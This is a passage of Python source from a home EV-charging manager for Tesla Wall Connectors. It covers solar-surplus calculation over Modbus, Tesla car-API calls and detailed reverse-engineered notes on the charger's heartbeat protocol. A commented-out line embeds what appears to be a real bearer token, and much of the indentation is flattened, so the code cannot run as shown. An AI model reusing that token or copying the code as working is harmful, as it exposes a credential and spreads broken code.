time.sleep(10) #Was 60s JMS
foundKnownError = True
break
if(foundKnownError):
continue
# This generally indicates a significant error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = 'error'
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
vehicle.lastErrorTime = now
elif(apiResponseDict['response']['result'] == False):
if(charge):
reason = apiResponseDict['response']['reason']
if(reason == 'complete' or reason == 'charging'):
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ' + str(vehicle.ID)
+ ' is done charging or already trying to charge. Stop asking to start charging.')
vehicle.stopAskingToStartCharging = True
else:
# Car was unable to charge for some other reason, such
# as 'could_not_wake_buses'.
if(reason == 'could_not_wake_buses'):
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start or stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
print(time_now() + ': ERROR "' + reason + '" when trying to ' +
startOrStop + ' car charging via Tesla car API. Will try again later.' +
"\nIf this error persists, please private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
result = 'error'
vehicle.lastErrorTime = now
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ': ERROR: Failed to ' + startOrStop
+ ' car charging via Tesla car API. Will try again later.')
vehicle.lastErrorTime = now
break
if(debugLevel >= 1 and carApiLastStartOrStopChargeTime == now):
print(time_now() + ': Car API ' + startOrStop + ' charge result: ' + result)
return result
def queue_background_task(task):
global backgroundTasksQueue, backgroundTasksCmds
if(task['cmd'] in backgroundTasksCmds):
# Some tasks, like cmd='charge', will be called once per second until
# a charge starts or we determine the car is done charging. To avoid
        # wasting memory queuing up a bunch of these tasks when we're handling
# a charge cmd already, don't queue two of the same task.
return
# Insert task['cmd'] in backgroundTasksCmds to prevent queuing another
# task['cmd'] till we've finished handling this one.
backgroundTasksCmds[task['cmd']] = True
# Queue the task to be handled by background_tasks_thread.
backgroundTasksQueue.put(task)
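# Usage examples (mirroring the task dicts handled by background_tasks_thread
# below):
#   queue_background_task({'cmd':'charge', 'charge':True})
#   queue_background_task({'cmd':'checkGreenEnergy'})
#   queue_background_task({'cmd':'carApiEmailPassword',
#                          'email':email, 'password':password})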
def background_tasks_thread():
global backgroundTasksQueue, backgroundTasksCmds, carApiLastErrorTime
while True:
task = backgroundTasksQueue.get()
if(task['cmd'] == 'charge'):
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
car_api_charge(task['charge'])
elif(task['cmd'] == 'carApiEmailPassword'):
carApiLastErrorTime = 0
car_api_available(task['email'], task['password'])
elif(task['cmd'] == 'checkGreenEnergy'):
check_green_energy()
# Delete task['cmd'] from backgroundTasksCmds such that
# queue_background_task() can queue another task['cmd'] in the future.
del backgroundTasksCmds[task['cmd']]
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
backgroundTasksQueue.task_done()
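# background_tasks_thread() is expected to run for the life of the program on
# its own daemon thread. A minimal sketch of how it would be started (the
# actual startup code lives elsewhere in this script, so treat this as an
# assumption rather than the exact code used):
#   backgroundTasksThread = threading.Thread(target=background_tasks_thread)
#   backgroundTasksThread.daemon = True
#   backgroundTasksThread.start()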
def check_green_energy():
global debugLevel, maxAmpsToDivideAmongSlaves, greenEnergyAmpsOffset, \
minAmpsPerTWC, backgroundTasksLock
# I check solar panel generation using an API exposed by The
# Energy Detective (TED). It's a piece of hardware available
    # at http://www.theenergydetective.com
# You may also be able to find a way to query a solar system
# on the roof using an API provided by your solar installer.
# Most of those systems only update the amount of power the
# system is producing every 15 minutes at most, but that's
# fine for tweaking your car charging.
#
# In the worst case, you could skip finding realtime green
# energy data and simply direct the car to charge at certain
# rates at certain times of day that typically have certain
# levels of solar or wind generation. To do so, use the hour
    # and min variables where this task gets queued (see
    # receive_slave_heartbeat below, which calls
    # queue_background_task({'cmd':'checkGreenEnergy'})).
#
# The curl command used below can be used to communicate
# with almost any web API, even ones that require POST
# values or authentication. The -s option prevents curl from
# displaying download stats. -m 60 prevents the whole
# operation from taking over 60 seconds.
#greenEnergyData = run_process('curl -s -m 60 "http://192.168.13.58/history/export.csv?T=1&D=0&M=1&C=1"')
Photovoltaic = 0
    SmartMeter = 0
    HouseBatt = 0
    #url_string = 'http://grafa.my-router.de:8086/write?db=iobroker'
url_string = 'http://192.168.0.4:8086/write?db=iobroker'
data_string = 'TWCMagager.CurrentChargingPower,from=TWCManager value=' + str(total_amps_actual_all_twcs()*225)
#myToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InBpIiwiZXhwIjoyMjM4ODgzMjAwfQ.xOwi_jQTLG2T41PF3NT54pKfpTAFfNFl6WldoivzwP8'
#header_string = {'Authorization': 'Bearer {}'.format(myToken)}
    ip = '192.168.0.70'  # IP address of the inverter we query over Modbus TCP
client = ModbusClient(ip,port=502)
try:
client.connect()
Photovoltaic = int(BinaryPayloadDecoder.fromRegisters(client.read_holding_registers(40092-1,2,unit=1).registers, byteorder=Endian.Big, wordorder=Endian.Big).decode_32bit_float())
SmartMeter = int(BinaryPayloadDecoder.fromRegisters(client.read_holding_registers(40098-1,2,unit=240).registers, byteorder=Endian.Big, wordorder=Endian.Big).decode_32bit_float())
#Fix this by reading from influxdb or something else
#HouseBatt = run_process('curl -s -m 5 "http://192.168.0.21:8087/getPlainValue/vis.0.Batt_Discharge"') #DIY Powerwall
# req.post(url_string, data=data_string, headers=header_string)
req.post(url_string, data=data_string)
    except Exception as e:
        # Don't let a Modbus or HTTP failure kill this background task; just
        # log the problem and carry on with the default values set above.
        print(time_now() + ': Failed to read green energy data: ' + str(e))
    finally:
        client.close()
# MTU, Time, Power, Cost, Voltage
# Solar,11/11/2017 14:20:43,-2.957,-0.29,124.3
# The only part we care about is -2.957 which is negative
# kW currently being generated. When 0kW is generated, the
# negative disappears so we make it optional in the regex
# below.
#m = re.search(b'^Solar,[^,]+,-?([^, ]+),', greenEnergyData, re.MULTILINE)
    SmartMeter = -int(SmartMeter)  # Raw meter value is negative when exporting, so negate: positive = surplus
    HouseBatt = int(float(HouseBatt))  # If the Powerwall is discharging, subtract that from the surplus
    # Power available for charging = grid surplus - battery discharge + what
    # the TWCs are already drawing (amps * ~225V).
    greenEnergyData = SmartMeter - HouseBatt + total_amps_actual_all_twcs() * 225
    if greenEnergyData > int(Photovoltaic):
        # Guard against timing issues: never report more than the PV output.
        greenEnergyData = int(Photovoltaic)
    print("SmartMeter %d HouseBatt %d" % (SmartMeter, HouseBatt))
m = int(greenEnergyData)
if(m):
#solarW = int(float(m.group(1))+1000)
solarW = m
# Use backgroundTasksLock to prevent changing maxAmpsToDivideAmongSlaves
# if the main thread is in the middle of examining and later using
# that value.
backgroundTasksLock.acquire()
        # Watts = Volts * Amps
        # This version of the code divides by 225 volts (the original
        # TWCManager logic assumed a 240V North American service) to work out
        # how many amps correspond to solarW, and limits the car to that many
        # amps.
maxAmpsToDivideAmongSlaves = (solarW / 225) + \
greenEnergyAmpsOffset
if(debugLevel >= 1):
print("%s: Solar generating %dW so limit car charging to:\n" \
" %.2fA + %.2fA = %.2fA. Charge when above %.0fA (minAmpsPerTWC)." % \
(time_now(), solarW, (solarW / 225),
greenEnergyAmpsOffset, maxAmpsToDivideAmongSlaves,
minAmpsPerTWC))
backgroundTasksLock.release()
else:
print(time_now() +
" ERROR: Can't determine current solar generation from:\n" +
str(greenEnergyData))
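# Worked example of the maths in check_green_energy(): with 4500W of usable
# surplus and a greenEnergyAmpsOffset of 0, maxAmpsToDivideAmongSlaves becomes
# 4500 / 225 = 20.00A. (This modified version divides by 225V; see the comment
# inside the function above.)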
#
# End functions
#
##############################
##############################
#
# Begin CarApiVehicle class
#
class CarApiVehicle:
ID = None
firstWakeAttemptTime = 0
lastWakeAttemptTime = 0
delayNextWakeAttempt = 0
lastErrorTime = 0
stopAskingToStartCharging = False
lat = 10000
lon = 10000
def __init__(self, ID):
self.ID = ID
def ready(self):
global carApiLastErrorTime, carApiErrorRetryMins
if(time.time() - self.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ ' not ready because of recent lastErrorTime '
+ str(self.lastErrorTime))
return False
if(self.firstWakeAttemptTime == 0 and time.time() - self.lastWakeAttemptTime < 2*60):
# Less than 2 minutes since we successfully woke this car, so it
# should still be awake. Tests on my car in energy saver mode show
# it returns to sleep state about two minutes after the last command
# was issued. Times I've tested: 1:35, 1:57, 2:30
return True
if(debugLevel >= 8):
print(time_now() + ': Vehicle ' + str(self.ID)
+ " not ready because it wasn't woken in the last 2 minutes.")
return False
def update_location(self):
global carApiLastErrorTime, carApiTransientErrors
if(self.ready() == False):
return False
apiResponseDict = {}
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(self.ID) + '/data_request/drive_state"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle GPS location', apiResponseDict, '\n')
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to get GPS location. Try again in 1 minute.")
time.sleep(10) #Was 60 JMS
foundKnownError = True
break
if(foundKnownError):
continue
response = apiResponseDict['response']
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if('reason' in response and response['reason'] == 'could_not_wake_buses'):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
self.lat = response['latitude']
self.lon = response['longitude']
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
if(debugLevel >= 1):
print(time_now() + ": ERROR: Can't get GPS location of vehicle " + str(self.ID) + \
". Will try again later.")
self.lastErrorTime = time.time()
return False
return True
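    # A successful drive_state response is shaped roughly like this (extra
    # fields omitted, values illustrative):
    #   {'response': {'latitude': 37.49, 'longitude': -121.94, ...}}
    # which is why the code above reads response['latitude'] and
    # response['longitude'].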
#
# End CarApiVehicle class
#
##############################
##############################
#
# Begin TWCSlave class
#
class TWCSlave:
TWCID = None
maxAmps = None
# Protocol 2 TWCs tend to respond to commands sent using protocol 1, so
# default to that till we know for sure we're talking to protocol 2.
protocolVersion = 1
minAmpsTWCSupports = 6
masterHeartbeatData = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00')
timeLastRx = time.time()
# reported* vars below are reported to us in heartbeat messages from a Slave
# TWC.
reportedAmpsMax = 0
reportedAmpsActual = 0
reportedState = 0
# reportedAmpsActual frequently changes by small amounts, like 5.14A may
# frequently change to 5.23A and back.
# reportedAmpsActualSignificantChangeMonitor is set to reportedAmpsActual
# whenever reportedAmpsActual is at least 0.8A different than
# reportedAmpsActualSignificantChangeMonitor. Whenever
# reportedAmpsActualSignificantChangeMonitor is changed,
# timeReportedAmpsActualChangedSignificantly is set to the time of the
# change. The value of reportedAmpsActualSignificantChangeMonitor should not
# be used for any other purpose. timeReportedAmpsActualChangedSignificantly
# is used for things like preventing start and stop charge on a car more
# than once per minute.
reportedAmpsActualSignificantChangeMonitor = -1
timeReportedAmpsActualChangedSignificantly = time.time()
lastAmpsOffered = -1
timeLastAmpsOfferedChanged = time.time()
lastHeartbeatDebugOutput = ''
timeLastHeartbeatDebugOutput = 0
wiringMaxAmps = wiringMaxAmpsPerTWC
def __init__(self, TWCID, maxAmps):
self.TWCID = TWCID
self.maxAmps = maxAmps
def print_status(self, heartbeatData):
global fakeMaster, masterTWCID
try:
debugOutput = ": SHB %02X%02X: %02X %05.2f/%05.2fA %02X%02X" % \
(self.TWCID[0], self.TWCID[1], heartbeatData[0],
(((heartbeatData[3] << 8) + heartbeatData[4]) / 100),
(((heartbeatData[1] << 8) + heartbeatData[2]) / 100),
heartbeatData[5], heartbeatData[6]
)
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" % (heartbeatData[7], heartbeatData[8]))
debugOutput += " M"
if(not fakeMaster):
debugOutput += " %02X%02X" % (masterTWCID[0], masterTWCID[1])
debugOutput += ": %02X %05.2f/%05.2fA %02X%02X" % \
(self.masterHeartbeatData[0],
(((self.masterHeartbeatData[3] << 8) + self.masterHeartbeatData[4]) / 100),
(((self.masterHeartbeatData[1] << 8) + self.masterHeartbeatData[2]) / 100),
self.masterHeartbeatData[5], self.masterHeartbeatData[6])
if(self.protocolVersion == 2):
debugOutput += (" %02X%02X" %
(self.masterHeartbeatData[7], self.masterHeartbeatData[8]))
            # Only output the once-per-second heartbeat debug info when
            # something other than the amps-in-use value has changed since the
            # last output, or when the amps in use have changed by at least
            # 1.0A. Also output if it's been 10 mins since the last output or
            # if debugLevel is turned up to 11.
lastAmpsUsed = 0
ampsUsed = 1
debugOutputCompare = debugOutput
m1 = re.search(r'SHB ....: .. (..\...)/', self.lastHeartbeatDebugOutput)
if(m1):
lastAmpsUsed = float(m1.group(1))
m2 = re.search(r'SHB ....: .. (..\...)/', debugOutput)
if(m2):
ampsUsed = float(m2.group(1))
if(m1):
debugOutputCompare = debugOutputCompare[0:m2.start(1)] + \
self.lastHeartbeatDebugOutput[m1.start(1):m1.end(1)] + \
debugOutputCompare[m2.end(1):]
if(
debugOutputCompare != self.lastHeartbeatDebugOutput
or abs(ampsUsed - lastAmpsUsed) >= 1.0
or time.time() - self.timeLastHeartbeatDebugOutput > 600
or debugLevel >= 11
):
print(time_now() + debugOutput)
self.lastHeartbeatDebugOutput = debugOutput
self.timeLastHeartbeatDebugOutput = time.time()
except IndexError:
# This happens if we try to access, say, heartbeatData[8] when
# len(heartbeatData) < 9. This was happening due to a bug I fixed
# but I may as well leave this here just in case.
if(len(heartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying heartbeatData',
heartbeatData, 'based on msg', hex_str(msg))
if(len(self.masterHeartbeatData) != (7 if self.protocolVersion == 1 else 9)):
print(time_now() + ': Error in print_status displaying masterHeartbeatData', self.masterHeartbeatData)
def send_slave_heartbeat(self, masterID):
# Send slave heartbeat
#
# Heartbeat includes data we store in slaveHeartbeatData.
# Meaning of data:
#
# Byte 1 is a state code:
# 00 Ready
# Car may or may not be plugged in.
# When car has reached its charge target, I've repeatedly seen it
# change from 03 to 00 the moment I wake the car using the phone app.
# 01 Plugged in, charging
# 02 Error
# This indicates an error such as not getting a heartbeat message
# from Master for too long.
# 03 Plugged in, do not charge
# I've seen this state briefly when plug is first inserted, and
# I've seen this state remain indefinitely after pressing stop
# charge on car's screen or when the car reaches its target charge
# percentage. Unfortunately, this state does not reliably remain
# set, so I don't think it can be used to tell when a car is done
# charging. It may also remain indefinitely if TWCManager script is
# stopped for too long while car is charging even after TWCManager
# is restarted. In that case, car will not charge even when start
# charge on screen is pressed - only re-plugging in charge cable
# fixes it.
# 04 Plugged in, ready to charge or charge scheduled
# I've seen this state even when car is set to charge at a future
# time via its UI. In that case, it won't accept power offered to
# it.
# 05 Busy?
# I've only seen it hit this state for 1 second at a time and it
# can seemingly happen during any other state. Maybe it means wait,
# I'm busy? Communicating with car?
# 08 Starting to charge?
# This state may remain for a few seconds while car ramps up from
# 0A to 1.3A, then state usually changes to 01. Sometimes car skips
# 08 and goes directly to 01.
# I saw 08 consistently each time I stopped fake master script with
# car scheduled to charge, plugged in, charge port blue. If the car
# is actually charging and you stop TWCManager, after 20-30 seconds
# the charge port turns solid red, steering wheel display says
# "charge cable fault", and main screen says "check charger power".
# When TWCManager is started, it sees this 08 status again. If we
# start TWCManager and send the slave a new max power value, 08
# becomes 00 and car starts charging again.
#
# Protocol 2 adds a number of other states:
# 06, 07, 09
# These are each sent as a response to Master sending the
# corresponding state. Ie if Master sends 06, slave responds with
# 06. See notes in send_master_heartbeat for meaning.
# 0A Amp adjustment period complete
# Master uses state 06 and 07 to raise or lower the slave by 2A
# temporarily. When that temporary period is over, it changes
# state to 0A.
# 0F was reported by another user but I've not seen it during testing
# and have no idea what it means.
#
# Byte 2-3 is the max current available as provided by bytes 2-3 in our
# fake master status.
# For example, if bytes 2-3 are 0F A0, combine them as 0x0fa0 hex which
# is 4000 in base 10. Move the decimal point two places left and you get
# 40.00Amps max.
#
        # Bytes 4-5 represent the current the car is actually drawing for
# charging. When a car is told to charge at 19A you may see a value like
# 07 28 which is 0x728 hex or 1832 in base 10. Move the decimal point
# two places left and you see the charger is using 18.32A.
# Some TWCs report 0A when a car is not charging while others may report
# small values such as 0.25A. I suspect 0A is what should be reported
# and any small value indicates a minor calibration error.
#
# Remaining bytes are always 00 00 from what I've seen and could be
# reserved for future use or may be used in a situation I've not
# observed. Protocol 1 uses two zero bytes while protocol 2 uses four.
###############################
# How was the above determined?
#
# An unplugged slave sends a status like this:
# 00 00 00 00 19 00 00
#
# A real master always sends all 00 status data to a slave reporting the
# above status. slaveHeartbeatData[0] is the main driver of how master
# responds, but whether slaveHeartbeatData[1] and [2] have 00 or non-00
# values also matters.
#
# I did a test with a protocol 1 TWC with fake slave sending
# slaveHeartbeatData[0] values from 00 to ff along with
# slaveHeartbeatData[1-2] of 00 and whatever
# value Master last responded with. I found:
# Slave sends: 04 00 00 00 19 00 00
# Master responds: 05 12 c0 00 00 00 00
#
# Slave sends: 04 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# Slave sends: 08 00 00 00 19 00 00
# Master responds: 08 12 c0 00 00 00 00
#
# Slave sends: 08 12 c0 00 19 00 00
# Master responds: 00 00 00 00 00 00 00
#
# In other words, master always sends all 00 unless slave sends
# slaveHeartbeatData[0] 04 or 08 with slaveHeartbeatData[1-2] both 00.
#
# I interpret all this to mean that when slave sends
# slaveHeartbeatData[1-2] both 00, it's requesting a max power from
# master. Master responds by telling the slave how much power it can
# use. Once the slave is saying how much max power it's going to use
# (slaveHeartbeatData[1-2] = 12 c0 = 32.00A), master indicates that's
# fine by sending 00 00.
#
# However, if the master wants to set a lower limit on the slave, all it
# has to do is send any heartbeatData[1-2] value greater than 00 00 at
# any time and slave will respond by setting its
# slaveHeartbeatData[1-2] to the same value.
#
# I thought slave might be able to negotiate a lower value if, say, the
# car reported 40A was its max capability or if the slave itself could
# only handle 80A, but the slave dutifully responds with the same value
# master sends it even if that value is an insane 655.35A. I tested
# these values on car which has a 40A limit when AC charging and
# slave accepts them all:
# 0f aa (40.10A)
# 1f 40 (80.00A)
# 1f 41 (80.01A)
# ff ff (655.35A)
global fakeTWCID, slaveHeartbeatData, overrideMasterHeartbeatData
if(self.protocolVersion == 1 and len(slaveHeartbeatData) > 7):
# Cut array down to length 7
slaveHeartbeatData = slaveHeartbeatData[0:7]
elif(self.protocolVersion == 2):
while(len(slaveHeartbeatData) < 9):
# Increase array length to 9
slaveHeartbeatData.append(0x00)
send_msg(bytearray(b'\xFD\xE0') + fakeTWCID + bytearray(masterID) + bytearray(slaveHeartbeatData))
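    # Worked example of the amp encoding described above: heartbeat bytes
    # 0F A0 are 0x0FA0 = 4000, i.e. 40.00A max current, and bytes 07 28 are
    # 0x0728 = 1832, i.e. the car is drawing 18.32A. In code form:
    #   amps = ((heartbeatData[1] << 8) + heartbeatData[2]) / 100
    # which matches how receive_slave_heartbeat() below decodes the same
    # fields.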
def send_master_heartbeat(self):
# Send our fake master's heartbeat to this TWCSlave.
#
# Heartbeat includes 7 bytes (Protocol 1) or 9 bytes (Protocol 2) of data
# that we store in masterHeartbeatData.
# Meaning of data:
#
# Byte 1 is a command:
# 00 Make no changes
# 02 Error
# Byte 2 appears to act as a bitmap where each set bit causes the
# slave TWC to enter a different error state. First 8 digits below
# show which bits are set and these values were tested on a Protocol
# 2 TWC:
# 0000 0001 = Middle LED blinks 3 times red, top LED solid green.
# Manual says this code means 'Incorrect rotary switch
# setting.'
# 0000 0010 = Middle LED blinks 5 times red, top LED solid green.
# Manual says this code means 'More than three Wall
# Connectors are set to Slave.'
# 0000 0100 = Middle LED blinks 6 times red, top LED solid green.
# Manual says this code means 'The networked Wall
# Connectors have different maximum current
# capabilities.'
# 0000 1000 = No effect
# 0001 0000 = No effect
# 0010 0000 = No effect
# 0100 0000 = No effect
# 1000 0000 = No effect
# When two bits are set, the lowest bit (rightmost bit) seems to
# take precedence (ie 111 results in 3 blinks, 110 results in 5
# blinks).
#
# If you send 02 to a slave TWC with an error code that triggers
# the middle LED to blink red, slave responds with 02 in its
# heartbeat, then stops sending heartbeat and refuses further
# communication. Slave's error state can be cleared by holding red
# reset button on its left side for about 4 seconds.
# If you send an error code with bitmap 11110xxx (where x is any bit),
# the error can not be cleared with a 4-second reset. Instead, you
# must power cycle the TWC or 'reboot' reset which means holding
# reset for about 6 seconds till all the LEDs turn green.
# 05 Tell slave charger to limit power to number of amps in bytes 2-3.
#
# Protocol 2 adds a few more command codes:
# 06 Increase charge current by 2 amps. Slave changes its heartbeat
# state to 06 in response. After 44 seconds, slave state changes to
# 0A but amp value doesn't change. This state seems to be used to
# safely creep up the amp value of a slave when the Master has extra
# power to distribute. If a slave is attached to a car that doesn't
# want that many amps, Master will see the car isn't accepting the
# amps and stop offering more. It's possible the 0A state change
# is not time based but rather indicates something like the car is
# now using as many amps as it's going to use.
# 07 Lower charge current by 2 amps. Slave changes its heartbeat state
# to 07 in response. After 10 seconds, slave raises its amp setting
# back up by 2A and changes state to 0A.
# I could be wrong, but when a real car doesn't want the higher amp
# value, I think the TWC doesn't raise by 2A after 10 seconds. Real
# Master TWCs seem to send 07 state to all children periodically as
# if to check if they're willing to accept lower amp values. If
# they do, Master assigns those amps to a different slave using the
# 06 state.
# 08 Master acknowledges that slave stopped charging (I think), but
# the next two bytes contain an amp value the slave could be using.
# 09 Tell slave charger to limit power to number of amps in bytes 2-3.
# This command replaces the 05 command in Protocol 1. However, 05
# continues to be used, but only to set an amp value to be used
# before a car starts charging. If 05 is sent after a car is
# already charging, it is ignored.
#
# Byte 2-3 is the max current a slave TWC can charge at in command codes
# 05, 08, and 09. In command code 02, byte 2 is a bitmap. With other
# command codes, bytes 2-3 are ignored.
# If bytes 2-3 are an amp value of 0F A0, combine them as 0x0fa0 hex
# which is 4000 in base 10. Move the decimal point two places left and
# you get 40.00Amps max.
#
# Byte 4: 01 when a Master TWC is physically plugged in to a car.
# Otherwise 00.
#
# Remaining bytes are always 00.
#
# Example 7-byte data that real masters have sent in Protocol 1:
# 00 00 00 00 00 00 00 (Idle)
# 02 04 00 00 00 00 00 (Error bitmap 04. This happened when I
# advertised a fake Master using an invalid max
# amp value)
# 05 0f a0 00 00 00 00 (Master telling slave to limit power to 0f a0
# (40.00A))
# 05 07 d0 01 00 00 00 (Master plugged in to a car and presumably
# telling slaves to limit power to 07 d0
# (20.00A). 01 byte indicates Master is plugged
# in to a car.)
global fakeTWCID, overrideMasterHeartbeatData, debugLevel, \
timeLastTx, carApiVehicles
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(self.protocolVersion == 2):
# TODO: Start and stop charging using protocol 2 commands to TWC
# instead of car api if I ever figure out how.
if(self.lastAmpsOffered == 0 and self.reportedAmpsActual > 4.0):
# Car is trying to charge, so stop it via car API.
# car_api_charge() will prevent telling the car to start or stop
# more than once per minute. Once the car gets the message to
# stop, reportedAmpsActualSignificantChangeMonitor should drop
# to near zero within a few seconds.
# WARNING: If you own two vehicles and one is charging at home but
# the other is charging away from home, this command will stop
# them both from charging. If the away vehicle is not currently
# charging, I'm not sure if this would prevent it from charging
# when next plugged in.
queue_background_task({'cmd':'charge', 'charge':False})
elif(self.lastAmpsOffered >= 5.0 and self.reportedAmpsActual < 2.0
and self.reportedState != 0x02
):
# Car is not charging and is not reporting an error state, so
# try starting charge via car api.
queue_background_task({'cmd':'charge', 'charge':True})
elif(self.reportedAmpsActual > 4.0):
# At least one plugged in car is successfully charging. We don't
# know which car it is, so we must set
# vehicle.stopAskingToStartCharging = False on all vehicles such
# that if any vehicle is not charging without us calling
# car_api_charge(False), we'll try to start it charging again at
# least once. This probably isn't necessary but might prevent
# some unexpected case from never starting a charge. It also
# seems less confusing to see in the output that we always try
# to start API charging after the car stops taking a charge.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
send_msg(bytearray(b'\xFB\xE0') + fakeTWCID + bytearray(self.TWCID)
+ bytearray(self.masterHeartbeatData))
def receive_slave_heartbeat(self, heartbeatData):
# Handle heartbeat message received from real slave TWC.
global debugLevel, nonScheduledAmpsMax, \
maxAmpsToDivideAmongSlaves, wiringMaxAmpsAllTWCs, \
timeLastGreenEnergyCheck, greenEnergyAmpsOffset, \
slaveTWCRoundRobin, spikeAmpsToCancel6ALimit, \
chargeNowAmps, chargeNowTimeEnd, minAmpsPerTWC
now = time.time()
self.timeLastRx = now
self.reportedAmpsMax = ((heartbeatData[1] << 8) + heartbeatData[2]) / 100
self.reportedAmpsActual = ((heartbeatData[3] << 8) + heartbeatData[4]) / 100
self.reportedState = heartbeatData[0]
# self.lastAmpsOffered is initialized to -1.
# If we find it at that value, set it to the current value reported by the
# TWC.
if(self.lastAmpsOffered < 0):
self.lastAmpsOffered = self.reportedAmpsMax
# Keep track of the amps the slave is actually using and the last time it
# changed by more than 0.8A.
# Also update self.reportedAmpsActualSignificantChangeMonitor if it's
# still set to its initial value of -1.
if(self.reportedAmpsActualSignificantChangeMonitor < 0
or abs(self.reportedAmpsActual - self.reportedAmpsActualSignificantChangeMonitor) > 0.8
):
self.timeReportedAmpsActualChangedSignificantly = now
self.reportedAmpsActualSignificantChangeMonitor = self.reportedAmpsActual
ltNow = time.localtime()
hourNow = ltNow.tm_hour + (ltNow.tm_min / 60)
yesterday = ltNow.tm_wday - 1
if(yesterday < 0):
yesterday += 7
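        # Example: at 14:30 on a Wednesday (tm_wday == 2), hourNow is 14.5 and
        # yesterday is 1 (Tuesday). Early on a Monday (tm_wday == 0), yesterday
        # wraps from -1 to 6 (Sunday).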
# Check if it's time to resume tracking green energy.
if(nonScheduledAmpsMax != -1 and hourResumeTrackGreenEnergy > -1
and hourResumeTrackGreenEnergy == hourNow
):
nonScheduledAmpsMax = -1
save_settings()
# Check if we're within the hours we must use scheduledAmpsMax instead
# of nonScheduledAmpsMax
blnUseScheduledAmps = 0
if(scheduledAmpsMax > 0
and
scheduledAmpsStartHour > -1
and
scheduledAmpsEndHour > -1
and
scheduledAmpsDaysBitmap > 0
):
if(scheduledAmpsStartHour > scheduledAmpsEndHour):
# We have a time like 8am to 7am which we must interpret as the
# 23-hour period after 8am or before 7am. Since this case always
# crosses midnight, we only ensure that scheduledAmpsDaysBitmap
# is set for the day the period starts on. For example, if
# scheduledAmpsDaysBitmap says only schedule on Monday, 8am to
# 7am, we apply scheduledAmpsMax from Monday at 8am to Monday at
# 11:59pm, and on Tuesday at 12am to Tuesday at 6:59am.
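            # Example with that Monday 8am-7am schedule: at 3am Tuesday,
            # hourNow (3) < scheduledAmpsEndHour (7) and yesterday is Monday,
            # so the (1 << yesterday) bit of scheduledAmpsDaysBitmap is set and
            # blnUseScheduledAmps becomes 1.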
if(
(
hourNow >= scheduledAmpsStartHour
and
(scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
)
or
(
hourNow < scheduledAmpsEndHour
and
(scheduledAmpsDaysBitmap & (1 << yesterday))
)
):
blnUseScheduledAmps = 1
else:
# We have a time like 7am to 8am which we must interpret as the
# 1-hour period between 7am and 8am.
if(hourNow >= scheduledAmpsStartHour
and hourNow < scheduledAmpsEndHour
and (scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
):
blnUseScheduledAmps = 1
if(chargeNowTimeEnd > 0 and chargeNowTimeEnd < now):
# We're beyond the one-day period where we want to charge at
# chargeNowAmps, so reset the chargeNow variables.
chargeNowAmps = 0
chargeNowTimeEnd = 0
if(chargeNowTimeEnd > 0 and chargeNowAmps > 0):
# We're still in the one-day period where we want to charge at
# chargeNowAmps, ignoring all other charging criteria.
maxAmpsToDivideAmongSlaves = chargeNowAmps
if(debugLevel >= 10):
print(time_now() + ': Charge at chargeNowAmps %.2f' % (chargeNowAmps))
elif(blnUseScheduledAmps):
# We're within the scheduled hours that we need to provide a set
# number of amps.
maxAmpsToDivideAmongSlaves = scheduledAmpsMax
else:
if(nonScheduledAmpsMax > -1):
maxAmpsToDivideAmongSlaves = nonScheduledAmpsMax
